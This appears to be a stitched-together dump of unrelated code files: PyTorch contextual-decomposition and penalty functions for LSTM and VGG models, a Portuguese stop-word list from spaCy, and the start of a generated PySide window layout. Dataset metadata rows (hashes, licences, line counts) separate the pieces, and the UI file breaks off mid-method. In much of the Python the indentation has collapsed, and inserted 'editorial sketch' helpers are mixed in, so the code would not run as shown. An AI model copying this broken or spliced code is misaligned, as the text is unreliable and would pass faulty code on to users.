irrel_i = torch.matmul(W_hi, prev_irrel_h)
irrel_g = torch.matmul(W_hg, prev_irrel_h)
irrel_f = torch.matmul(W_hf, prev_irrel_h)
irrel_o = torch.matmul(W_ho, prev_irrel_h)
w_ii_contrib = torch.matmul(W_ii, word_vecs[i])
w_ig_contrib = torch.matmul(W_ig, word_vecs[i])
w_if_contrib = torch.matmul(W_if, word_vecs[i])
w_io_contrib = torch.matmul(W_io, word_vecs[i])
is_in_relevant = ((start <= i) * (i <= stop)).cuda().float()
is_not_in_relevant = 1 - is_in_relevant
rel_i = rel_i + is_in_relevant * w_ii_contrib
rel_g = rel_g + is_in_relevant * w_ig_contrib
rel_f = rel_f + is_in_relevant * w_if_contrib
rel_o = rel_o + is_in_relevant * w_io_contrib
irrel_i = irrel_i + is_not_in_relevant * w_ii_contrib
irrel_g = irrel_g + is_not_in_relevant * w_ig_contrib
irrel_f = irrel_f + is_not_in_relevant * w_if_contrib
irrel_o = irrel_o + is_not_in_relevant * w_io_contrib
rel_contrib_i, irrel_contrib_i, bias_contrib_i = propagate_three(rel_i, irrel_i, b_i[:,None], sigmoid)
rel_contrib_g, irrel_contrib_g, bias_contrib_g = propagate_three(rel_g, irrel_g, b_g[:,None], tanh)
relevant = rel_contrib_i * (rel_contrib_g + bias_contrib_g) + bias_contrib_i * rel_contrib_g
irrelevant = irrel_contrib_i * (rel_contrib_g + irrel_contrib_g + bias_contrib_g) + (rel_contrib_i + bias_contrib_i) * irrel_contrib_g
        bias_contrib = bias_contrib_i * bias_contrib_g
        is_in_relevant_bias = ((start <= i) * (i < stop)).cuda().float()
        is_not_in_relevant_bias = 1 - is_in_relevant_bias
        relevant = relevant + is_in_relevant_bias * bias_contrib
        irrelevant = irrelevant + is_not_in_relevant_bias * bias_contrib
if i > 0:
rel_contrib_f, irrel_contrib_f, bias_contrib_f = propagate_three(rel_f, irrel_f, b_f[:,None], sigmoid)
            relevant = relevant + (rel_contrib_f + bias_contrib_f) * prev_rel
            irrelevant = irrelevant + (rel_contrib_f + irrel_contrib_f + bias_contrib_f) * prev_irrel + irrel_contrib_f * prev_rel
o = sigmoid(torch.matmul(W_io, word_vecs[i]) + torch.matmul(W_ho, prev_rel_h + prev_irrel_h) + b_o[:,None])
new_rel_h, new_irrel_h = propagate_tanh_two(relevant, irrelevant)
relevant_h = o * new_rel_h
irrelevant_h = o * new_irrel_h
prev_rel = relevant
prev_irrel = irrelevant
W_out = model.hidden_to_label.weight
# Sanity check: scores + irrel_scores should equal the LSTM's output minus model.hidden_to_label.bias
scores = torch.matmul(W_out, relevant_h)
irrel_scores = torch.matmul(W_out, irrelevant_h)
return scores, irrel_scores
def cd_text(batch, model, start, stop, batch_id = 0,my_device = 0):
    # single-example version of the decomposition (uses the batch element selected by batch_id)
weights = model.lstm.state_dict()
# Index one = word vector (i) or hidden state (h), index two = gate
W_ii, W_if, W_ig, W_io = torch.chunk(weights['weight_ih_l0'], 4, 0)
W_hi, W_hf, W_hg, W_ho = torch.chunk(weights['weight_hh_l0'], 4, 0)
b_i, b_f, b_g, b_o = torch.chunk(weights['bias_ih_l0'] + weights['bias_hh_l0'], 4)
word_vecs = model.embed(batch.text)[:, batch_id].data
T = word_vecs.shape[0]
relevant = torch.zeros((T, model.hidden_dim), device =torch.device(my_device))
irrelevant = torch.zeros((T, model.hidden_dim), device =torch.device(my_device))
relevant_h = torch.zeros((T, model.hidden_dim), device =torch.device(my_device))
irrelevant_h = torch.zeros((T, model.hidden_dim), device =torch.device(my_device))
for i in range(T):
if i > 0:
prev_rel_h = relevant_h[i - 1]
prev_irrel_h = irrelevant_h[i - 1]
else:
prev_rel_h = torch.zeros(model.hidden_dim, device =torch.device(my_device))
prev_irrel_h = torch.zeros(model.hidden_dim, device =torch.device(my_device))
rel_i = torch.matmul(W_hi, prev_rel_h)
rel_g = torch.matmul(W_hg, prev_rel_h)
rel_f = torch.matmul(W_hf, prev_rel_h)
rel_o = torch.matmul(W_ho, prev_rel_h)
irrel_i = torch.matmul(W_hi, prev_irrel_h)
irrel_g = torch.matmul(W_hg, prev_irrel_h)
irrel_f = torch.matmul(W_hf, prev_irrel_h)
irrel_o = torch.matmul(W_ho, prev_irrel_h)
if start <= i <= stop:
rel_i = rel_i + torch.matmul(W_ii, word_vecs[i])
rel_g = rel_g + torch.matmul(W_ig, word_vecs[i])
rel_f = rel_f + torch.matmul(W_if, word_vecs[i])
rel_o = rel_o + torch.matmul(W_io, word_vecs[i])
else:
irrel_i = irrel_i + torch.matmul(W_ii, word_vecs[i])
irrel_g = irrel_g + torch.matmul(W_ig, word_vecs[i])
irrel_f = irrel_f + torch.matmul(W_if, word_vecs[i])
irrel_o = irrel_o + torch.matmul(W_io, word_vecs[i])
rel_contrib_i, irrel_contrib_i, bias_contrib_i = propagate_three(rel_i, irrel_i, b_i, sigmoid)
rel_contrib_g, irrel_contrib_g, bias_contrib_g = propagate_three(rel_g, irrel_g, b_g, tanh)
relevant[i] = rel_contrib_i * (rel_contrib_g + bias_contrib_g) + bias_contrib_i * rel_contrib_g
irrelevant[i] = irrel_contrib_i * (rel_contrib_g + irrel_contrib_g + bias_contrib_g) + (
rel_contrib_i + bias_contrib_i) * irrel_contrib_g
if start <= i <= stop:
relevant[i] += bias_contrib_i * bias_contrib_g
else:
irrelevant[i] += bias_contrib_i * bias_contrib_g
if i > 0:
rel_contrib_f, irrel_contrib_f, bias_contrib_f = propagate_three(rel_f, irrel_f, b_f, sigmoid)
relevant[i] += (rel_contrib_f + bias_contrib_f) * relevant[i - 1]
irrelevant[i] += (rel_contrib_f + irrel_contrib_f + bias_contrib_f) * irrelevant[i - 1] + irrel_contrib_f * \
relevant[i - 1]
o = sigmoid(torch.matmul(W_io, word_vecs[i]) + torch.matmul(W_ho, prev_rel_h + prev_irrel_h) + b_o)
#rel_contrib_o, irrel_contrib_o, bias_contrib_o = propagate_three(rel_o, irrel_o, b_o, sigmoid)
new_rel_h, new_irrel_h = propagate_tanh_two(relevant[i], irrelevant[i])
relevant_h[i] = o * new_rel_h
irrelevant_h[i] = o * new_irrel_h
W_out = model.hidden_to_label.weight.data
# Sanity check: scores + irrel_scores should equal the LSTM's output minus model.hidden_to_label.bias
scores = torch.matmul(W_out, relevant_h[T - 1])
irrel_scores = torch.matmul(W_out, irrelevant_h[T - 1])
tolerance = 0.001
assert torch.sum(torch.abs((model.forward(batch) -model.hidden_to_label.bias.data) - (scores+irrel_scores))).cpu().detach().numpy() < tolerance
return scores
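# Editorial sketch (not in the original file): word-level importances for a single
# example can be read off by decomposing one position at a time with cd_text.
# Assumes the same batch/model interfaces as above.
def cd_word_importances(batch, model, n_words):
    # one per-class score contribution per word position
    return [cd_text(batch, model, start=i, stop=i) for i in range(n_words)]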
def softmax_out(output):
return torch.nn.functional.softmax(torch.stack((output[0].reshape(-1),output[1].reshape(-1)), 1), dim = 1)
def is_in_relevant_toy(batch, start, stop, class_rules):
    # XXX: only valid for the current toy model, where the relevant digit for each class is given by class_rules
    rel_digits = ((batch.label == 0)[None, :] * (batch.text == class_rules[0])) + (batch.label == 1)[None, :] * (batch.text == class_rules[1])
relevant = rel_digits[start:stop].sum(dim=0)
irrelevant = rel_digits.sum(dim=0) - relevant
test_out = torch.cat((relevant[:, None], irrelevant[:, None]), 1)
return test_out
def cd_penalty_for_one_toy(batch, model1, start, stop,class_rules):
# get output
model1_output = cd_batch_text(batch, model1, start, stop)
# only use the correct class
correct_idx = (batch.label, torch.arange(batch.label.shape[0]))
model1_softmax = softmax_out((model1_output[0][correct_idx],model1_output[1][correct_idx]))
model2_softmax = is_in_relevant_toy(batch, start, stop,class_rules).cuda().float()
output = -(torch.log(model1_softmax)*model2_softmax).mean()
return output
def is_in_relevant_decoy(batch, start, stop, class_rules):
    is_decoy = ((batch.label == 0) * (batch.text[start:stop] == class_rules[0]) + (batch.label == 1) * (batch.text[start:stop] == class_rules[1]))
return is_decoy.sum(dim=0)
def cd_penalty_for_one_decoy(batch, model1, start, stop,class_rules):
model1_output = cd_batch_text(batch, model1, start, stop)
correct_idx = (batch.label, torch.arange(batch.label.shape[0])) # only use the correct class
model1_softmax = softmax_out((model1_output[0][correct_idx],model1_output[1][correct_idx]))
mask_decoy_in_relevant = is_in_relevant_decoy(batch, start, stop,class_rules).cuda()
if mask_decoy_in_relevant.byte().any():
masked_relevant = model1_softmax[:,1].masked_select(mask_decoy_in_relevant.byte())
output = -(torch.log(masked_relevant)).mean()
return output
else:
return torch.zeros(1).cuda()
def cd_penalty_annotated(batch, model1, start, stop, scores):
# get index where annotation present:
idx_nonzero = (start != -1).nonzero()[:,0] # find the ones where annotation exists
    model_output = cd_text_irreg_scores(batch.text[:, idx_nonzero], model1, start[idx_nonzero], stop[idx_nonzero])[0]  # relevant scores for class 0 vs class 1
    model_softmax = torch.nn.functional.softmax(model_output, dim=0)[batch.label[idx_nonzero], np.arange(len(idx_nonzero))]  # softmax over classes, keep the correct class
    output = -(torch.log(model_softmax) * scores[idx_nonzero].float()).mean()  # if the annotation agrees, maximize the relevant score; if it disagrees, minimize it
    # alternative (unused): -(torch.log(1 - model_softmax) * (1 - scores[idx_nonzero]).float()).mean()
return output
# def cd_penalty_annotated(batch, model1, start, stop, scores):
# # get index where annotation present:
# idx_nonzero = (start != -1).nonzero()[:,0]
# model_output = cd_text_irreg_scores(batch.text[:, idx_nonzero], model1, start[ idx_nonzero], stop[idx_nonzero])[0]
# correct_idx = (batch.label[ idx_nonzero], torch.arange(batch.label[ idx_nonzero].shape[0]) )
# model_softmax = torch.nn.functional.softmax(model_output, dim =0)[correct_idx]
# output = -(torch.log(model_softmax)*scores[ idx_nonzero].float()).mean() -(torch.log(model_softmax)*(1- scores[ idx_nonzero]).float() ).mean() #next thing to try
# print(output, torch.log(model_softmax).mean())
# return output
# def cd_penalty_annotated(batch, model1, start, stop, agrees):
# model1_output = cd_text_irreg_scores(batch.text, model1, start, stop)
# correct_idx = (batch.label, torch.arange(batch.label.shape[0])) # only use the correct class
# model1_softmax = softmax_out((model1_output[0][0],model1_output[0][1]))[correct_idx]
# output = -(torch.log(model1_softmax) * agrees.float()).mean() #+ (torch.log(model1_softmax) * (1-agrees).float()).mean()
# return output
def cd_penalty_for_one_decoy_all(batch, model1, start, stop):
mask_exists =(start!=-1).byte().cuda()
if mask_exists.any():
model1_output = cd_text_irreg_scores(batch.text, model1, start, stop)
correct_idx = (batch.label, torch.arange(batch.label.shape[0])) # only use the correct class
wrong_idx = (1-batch.label, torch.arange(batch.label.shape[0]))
model1_softmax = softmax_out((model1_output[0][correct_idx],model1_output[1][correct_idx])) #+ softmax_out((model1_output[0][wrong_idx],model1_output[1][wrong_idx]))
output = (torch.log(model1_softmax[:,1])).masked_select(mask_exists)
return -output.mean()
else:
return torch.zeros(1).cuda()
def cd_penalty(batch, model1, model2, start, stop):
model1_output = cd_batch_text(batch, model1, start, stop)
model2_output = cd_batch_text(batch, model2, start, stop)
model1_softmax = softmax_out(model1_output)
model2_softmax = softmax_out(model2_output)
return ((model1_softmax-model2_softmax)*(torch.log(model1_softmax) - torch.log(model2_softmax))).sum(dim=1).reshape((2,-1)).sum(dim=0)
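# Editorial sketch (not part of the original source): the penalties above are meant
# to be added to the usual classification loss during training. `criterion` and
# `lambda_cd` are assumed names for the training loop's loss and penalty weight,
# not names defined in this file.
def cd_regularized_loss(batch, model, start, stop, criterion, lambda_cd=1.0):
    task_loss = criterion(model(batch), batch.label)
    explanation_loss = cd_penalty_for_one_decoy_all(batch, model, start, stop)
    return task_loss + lambda_cd * explanation_loss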
# this implementation of cd is very long so that we can view CD at intermediate layers
# in reality, this should be a loop which uses the above functions
def cd_vgg_features(blob,im_torch, model, model_type='vgg'):
# set up model
model.eval()
# set up blobs
blob = torch.cuda.FloatTensor(blob)
relevant = blob * im_torch
irrelevant = (1 - blob) * im_torch
mods = list(model.modules())[2:]
# (0): Conv2d (3, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (1): ReLU(inplace)
# (2): Conv2d (64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (3): ReLU(inplace)
# (4): MaxPool2d(kernel_size=(2, 2), stride=(2, 2), dilation=(1, 1))
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[0])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[1])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[2])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[3])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[4], model_type=model_type)
# (5): Conv2d (64, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (6): ReLU(inplace)
# (7): Conv2d (128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (8): ReLU(inplace)
# (9): MaxPool2d(kernel_size=(2, 2), stride=(2, 2), dilation=(1, 1))
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[5])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[6])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[7])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[8])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[9], model_type=model_type)
# (10): Conv2d (128, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (11): ReLU(inplace)
# (12): Conv2d (256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (13): ReLU(inplace)
# (14): Conv2d (256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (15): ReLU(inplace)
# (16): MaxPool2d(kernel_size=(2, 2), stride=(2, 2), dilation=(1, 1))
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[10])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[11])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[12])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[13])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[14])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[15])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[16], model_type=model_type)
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[17])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[18])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[19])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[20])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[21])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[22])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[23], model_type=model_type)
# scores.append((relevant.clone(), irrelevant.clone()))
# (24): Conv2d (512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (25): ReLU(inplace)
# (26): Conv2d (512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (27): ReLU(inplace)
# (28): Conv2d (512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (29): ReLU(inplace)
# (30): MaxPool2d(kernel_size=(2, 2), stride=(2, 2), dilation=(1, 1))
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[24])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[25])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[26])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[27])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[28])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[29])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[30], model_type=model_type)
relevant, irrelevant = propagate_AdaptiveAvgPool2d(relevant, irrelevant, mods[31])
# scores.append((relevant.clone(), irrelevant.clone()))
# return relevant, irrelevant
relevant = relevant.view(relevant.size(0), -1)
irrelevant = irrelevant.view(irrelevant.size(0), -1)
return relevant, irrelevant
def cd_vgg_classifier(relevant, irrelevant, im_torch, model, model_type='vgg'):
# set up model
model.eval()
mods = list(model.modules())[1:]
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[0])
# print(relevant.shape)
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[1])
relevant, irrelevant = propagate_dropout(relevant, irrelevant, mods[2])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[3])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[4])
relevant, irrelevant = propagate_dropout(relevant, irrelevant, mods[5])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[6])
# only interested in not cancer, which is class 0
#model.train()
return relevant, irrelevant
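# Editorial sketch (not in the original file): the two halves above are intended to
# be chained -- cd_vgg_features over the network, then cd_vgg_classifier over the
# classifier head. Passing `model` and `model.classifier` follows torchvision's VGG
# layout and is an assumption, not something this file pins down.
def cd_vgg_full(blob, im_torch, model):
    rel, irrel = cd_vgg_features(blob, im_torch, model)
    return cd_vgg_classifier(rel, irrel, im_torch, model.classifier)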
def cd_track_vgg(blob, im_torch, model, model_type='vgg'):
# set up model
model.eval()
# set up blobs
blob = torch.cuda.FloatTensor(blob)
relevant = blob * im_torch
irrelevant = (1 - blob) * im_torch
mods = list(model.modules())[2:]
# (0): Conv2d (3, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (1): ReLU(inplace)
# (2): Conv2d (64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (3): ReLU(inplace)
# (4): MaxPool2d(kernel_size=(2, 2), stride=(2, 2), dilation=(1, 1))
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[0])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[1])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[2])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[3])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[4], model_type=model_type)
# (5): Conv2d (64, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (6): ReLU(inplace)
# (7): Conv2d (128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (8): ReLU(inplace)
# (9): MaxPool2d(kernel_size=(2, 2), stride=(2, 2), dilation=(1, 1))
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[5])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[6])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[7])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[8])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[9], model_type=model_type)
# (10): Conv2d (128, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (11): ReLU(inplace)
# (12): Conv2d (256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (13): ReLU(inplace)
# (14): Conv2d (256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (15): ReLU(inplace)
# (16): MaxPool2d(kernel_size=(2, 2), stride=(2, 2), dilation=(1, 1))
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[10])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[11])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[12])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[13])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[14])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[15])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[16], model_type=model_type)
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[17])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[18])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[19])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[20])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[21])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[22])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[23], model_type=model_type)
# scores.append((relevant.clone(), irrelevant.clone()))
# (24): Conv2d (512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (25): ReLU(inplace)
# (26): Conv2d (512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (27): ReLU(inplace)
# (28): Conv2d (512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (29): ReLU(inplace)
# (30): MaxPool2d(kernel_size=(2, 2), stride=(2, 2), dilation=(1, 1))
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[24])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[25])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[26])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[27])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[28])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[29])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[30], model_type=model_type)
relevant, irrelevant = propagate_AdaptiveAvgPool2d(relevant, irrelevant, mods[31])
# scores.append((relevant.clone(), irrelevant.clone()))
# return relevant, irrelevant
relevant = relevant.view(relevant.size(0), -1)
irrelevant = irrelevant.view(irrelevant.size(0), -1)
# (classifier): Sequential(
# (0): Linear(in_features=25088, out_features=4096)
# (1): ReLU(inplace)
# (2): Dropout(p=0.5)
# (3): Linear(in_features=4096, out_features=4096)
# (4): ReLU(inplace)
# (5): Dropout(p=0.5)
# (6): Linear(in_features=4096, out_features=1000)
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[33])
# print(relevant.shape)
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[34])
relevant, irrelevant = propagate_dropout(relevant, irrelevant, mods[35])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[36])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[37])
relevant, irrelevant = propagate_dropout(relevant, irrelevant, mods[38])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[39])
return relevant, irrelevant
| 49.599132
| 190
| 0.664663
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 6,942
| 0.20255
|
774b06809a445d82f24ad6693ec8a85d76b2e232
| 2,554
|
py
|
Python
|
spacy/lang/pt/stop_words.py
|
cedar101/spaCy
|
66e22098a8bb77cbe527b1a4a3c69ec1cfb56f95
|
[
"MIT"
] | 12
|
2019-03-20T20:43:47.000Z
|
2020-04-13T11:10:52.000Z
|
spacy/lang/pt/stop_words.py
|
cedar101/spaCy
|
66e22098a8bb77cbe527b1a4a3c69ec1cfb56f95
|
[
"MIT"
] | 13
|
2018-06-05T11:54:40.000Z
|
2019-07-02T11:33:14.000Z
|
spacy/lang/pt/stop_words.py
|
cedar101/spaCy
|
66e22098a8bb77cbe527b1a4a3c69ec1cfb56f95
|
[
"MIT"
] | 2
|
2020-02-15T18:33:35.000Z
|
2022-02-13T14:11:41.000Z
|
# coding: utf8
from __future__ import unicode_literals
STOP_WORDS = set(
"""
à às área acerca ademais adeus agora ainda algo algumas alguns ali além ambas ambos antes
ao aos apenas apoia apoio apontar após aquela aquelas aquele aqueles aqui aquilo
as assim através atrás até aí
baixo bastante bem boa bom breve
cada caminho catorze cedo cento certamente certeza cima cinco coisa com como
comprida comprido conhecida conhecido conselho contra contudo corrente cuja
cujo custa cá
da daquela daquele dar das de debaixo demais dentro depois des desde dessa desse
desta deste deve devem deverá dez dezanove dezasseis dezassete dezoito diante
direita disso diz dizem dizer do dois dos doze duas dá dão
é és ela elas ele eles em embora enquanto entre então era essa essas esse esses esta
estado estar estará estas estava este estes esteve estive estivemos estiveram
estiveste estivestes estou está estás estão eu eventual exemplo
falta fará favor faz fazeis fazem fazemos fazer fazes fazia faço fez fim final
foi fomos for fora foram forma foste fostes fui
geral grande grandes grupo
inclusive iniciar inicio ir irá isso isto
já
lado lhe ligado local logo longe lugar lá
maior maioria maiorias mais mal mas me meio menor menos meses mesmo meu meus mil
minha minhas momento muito muitos máximo mês
na nada naquela naquele nas nem nenhuma nessa nesse nesta neste no nos nossa
nossas nosso nossos nova novas nove novo novos num numa nunca nuns não nível nós
número números
obrigada obrigado oitava oitavo oito onde ontem onze ora os ou outra outras outros
para parece parte partir pegar pela pelas pelo pelos perto pode podem poder poderá
podia pois ponto pontos por porquanto porque porquê portanto porém posição
possivelmente posso possível pouca pouco povo primeira primeiro próprio próxima
próximo puderam pôde põe põem
quais qual qualquer quando quanto quarta quarto quatro que quem quer querem quero
questão quieta quieto quinta quinto quinze quê
relação
sabe saber se segunda segundo sei seis sem sempre ser seria sete seu seus sexta
sexto sim sistema sob sobre sois somente somos sou sua suas são sétima sétimo só
tais tal talvez também tanta tanto tarde te tem temos tempo tendes tenho tens
tentar tentaram tente tentei ter terceira terceiro teu teus teve tipo tive
tivemos tiveram tiveste tivestes toda todas todo todos treze três tu tua tuas
tudo tão têm
um uma umas uns usa usar último
vai vais valor veja vem vens ver vez vezes vinda vindo vinte você vocês vos vossa
vossas vosso vossos vários vão vêm vós
zero
""".split()
)
| 35.971831
| 89
| 0.817541
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,541
| 0.970959
|
774b9166abe0ad0a7b9b9dd1b88e0f21b94c408a
| 13,906
|
py
|
Python
|
miaschiev_ui.py
|
DarkStarSword/miasmata-fixes
|
d320f5e68cd5ebabd14efd7af021afa7e63d161e
|
[
"MIT"
] | 10
|
2015-06-13T17:27:18.000Z
|
2021-02-14T13:03:11.000Z
|
miaschiev_ui.py
|
DarkStarSword/miasmata-fixes
|
d320f5e68cd5ebabd14efd7af021afa7e63d161e
|
[
"MIT"
] | 2
|
2020-07-11T18:34:57.000Z
|
2021-03-07T02:27:46.000Z
|
miaschiev_ui.py
|
DarkStarSword/miasmata-fixes
|
d320f5e68cd5ebabd14efd7af021afa7e63d161e
|
[
"MIT"
] | 1
|
2016-03-23T22:26:23.000Z
|
2016-03-23T22:26:23.000Z
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'miaschiev.ui'
#
# Created: Wed Aug 06 17:13:17 2014
# by: pyside-uic 0.2.15 running on PySide 1.2.1
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore, QtGui
class Ui_Miaschiev(object):
def setupUi(self, Miaschiev):
Miaschiev.setObjectName("Miaschiev")
Miaschiev.resize(1333, 860)
self.centralwidget = QtGui.QWidget(Miaschiev)
self.centralwidget.setObjectName("centralwidget")
self.horizontalLayout_2 = QtGui.QHBoxLayout(self.centralwidget)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.verticalLayout = QtGui.QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.gridLayout = QtGui.QGridLayout()
self.gridLayout.setObjectName("gridLayout")
self.install_path = QtGui.QLineEdit(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.install_path.sizePolicy().hasHeightForWidth())
self.install_path.setSizePolicy(sizePolicy)
self.install_path.setObjectName("install_path")
self.gridLayout.addWidget(self.install_path, 2, 0, 1, 1)
self.save_browse = QtGui.QPushButton(self.centralwidget)
self.save_browse.setObjectName("save_browse")
self.gridLayout.addWidget(self.save_browse, 4, 1, 1, 1)
self.install_browse = QtGui.QPushButton(self.centralwidget)
self.install_browse.setObjectName("install_browse")
self.gridLayout.addWidget(self.install_browse, 2, 1, 1, 1)
self.save_path = QtGui.QLineEdit(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.save_path.sizePolicy().hasHeightForWidth())
self.save_path.setSizePolicy(sizePolicy)
self.save_path.setObjectName("save_path")
self.gridLayout.addWidget(self.save_path, 4, 0, 1, 1)
self.label_2 = QtGui.QLabel(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_2.sizePolicy().hasHeightForWidth())
self.label_2.setSizePolicy(sizePolicy)
self.label_2.setObjectName("label_2")
self.gridLayout.addWidget(self.label_2, 3, 0, 1, 2)
self.label = QtGui.QLabel(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label.sizePolicy().hasHeightForWidth())
self.label.setSizePolicy(sizePolicy)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 1, 0, 1, 2)
self.verticalLayout.addLayout(self.gridLayout)
spacerItem = QtGui.QSpacerItem(20, 32, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
self.verticalLayout.addItem(spacerItem)
self.save0 = QtGui.QPushButton(self.centralwidget)
self.save0.setEnabled(False)
self.save0.setMinimumSize(QtCore.QSize(0, 38))
self.save0.setMaximumSize(QtCore.QSize(416, 16777215))
self.save0.setObjectName("save0")
self.verticalLayout.addWidget(self.save0)
self.save1 = QtGui.QPushButton(self.centralwidget)
self.save1.setEnabled(False)
self.save1.setMinimumSize(QtCore.QSize(0, 38))
self.save1.setMaximumSize(QtCore.QSize(416, 16777215))
self.save1.setObjectName("save1")
self.verticalLayout.addWidget(self.save1)
